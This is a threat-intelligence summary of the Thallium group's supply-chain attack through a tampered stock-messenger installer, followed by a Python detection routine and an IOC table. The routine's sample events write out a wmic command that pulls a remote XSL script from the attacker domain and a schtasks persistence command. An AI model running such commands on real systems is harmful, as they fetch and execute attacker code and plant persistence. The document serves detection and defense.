Thallium group exploits private stock-investment messenger to carry out software supply-chain attack

2021-01-03 ESTSecurity Thallium organization exploits private stock investment messenger to carry out software supply chain attacks

https://blog.alyac.co.kr/3489


ESRC reported that the North Korea-linked Thallium group modified a private stock-investment messenger installer to conduct a software supply-chain attack, expanding beyond its usual spear-phishing activity. The NSIS installer executed wmic.exe to retrieve remote XSL/VBS commands over FTP, created ProgramData folders such as OracleCache, PackageUninstall, and USODrive, and contacted frog.smtper[.]co for follow-on commands. Persistence was established through a scheduled task named Office365__ that repeatedly ran usopub.vbs and used WMIC to beacon to the attacker-controlled FTP path with victim PC information. ESRC also observed malicious documents using the same XSL Script Processing technique and noted search.greenulz[.]com as related infrastructure.
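As an added example (not code from the ESRC post), a small detection routine run over constructed endpoint process-creation events that flags the behaviours summarized above: wmic.exe pulling a remote XSL via /format:, a scheduled task named Office365__ running usopub.vbs, the ProgramData staging folders, and the two listed domains. The event field names and rule names are assumptions.

```python
import re
from typing import Dict, List

# Indicators taken from the ESRC summary above (paths, task name, domains);
# the events further down are constructed for this example, not real captures.
SUSPECT_DIRS = ("oraclecache", "packageuninstall", "usodrive")
TASK_NAME = "office365__"
SCRIPT_NAME = "usopub.vbs"
C2_DOMAINS = ("frog.smtper.co", "search.greenulz.com")

# wmic /format:<URL> fetches an XSL stylesheet from a remote host and runs the
# script it contains (the "XSL Script Processing" technique ESRC describes).
WMIC_REMOTE_FORMAT = re.compile(r"/format:\s*\"?(?:ftp|https?)://", re.IGNORECASE)


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event matches (empty list if clean)."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    cmd_l = cmd.lower()
    hits: List[str] = []
    if image.endswith("wmic.exe") and WMIC_REMOTE_FORMAT.search(cmd):
        hits.append("wmic_remote_xsl")
    if image.endswith("schtasks.exe") and (TASK_NAME in cmd_l or SCRIPT_NAME in cmd_l):
        hits.append("office365_task")
    if any(f"\\programdata\\{d}\\" in cmd_l for d in SUSPECT_DIRS):
        hits.append("programdata_staging_dir")
    if any(d in cmd_l for d in C2_DOMAINS):
        hits.append("known_c2_domain")
    return hits


# Constructed sample events in a Sysmon-like shape (assumed field names).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\wmic.exe",
     "CommandLine": r'wmic os get /format:"ftp://frog.smtper.co/x.xsl"'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn Office365__ /tr "wscript C:\ProgramData\USODrive\usopub.vbs" /sc minute'},
    {"Image": r"C:\Windows\System32\wbem\wmic.exe",
     "CommandLine": "wmic os get caption"},  # benign local WMIC use, should not fire
]


def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each suspicious command line to the rules it triggered, dropping clean events."""
    return {e["CommandLine"]: classify(e) for e in events if classify(e)}
```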

Indicators of Compromise

Type    Value                First Seen   Last Seen
DOMAIN  search.greenulz.com  2021-01-03   2021-01-24
DOMAIN  frog.smtper.co       2021-01-03   2021-01-03
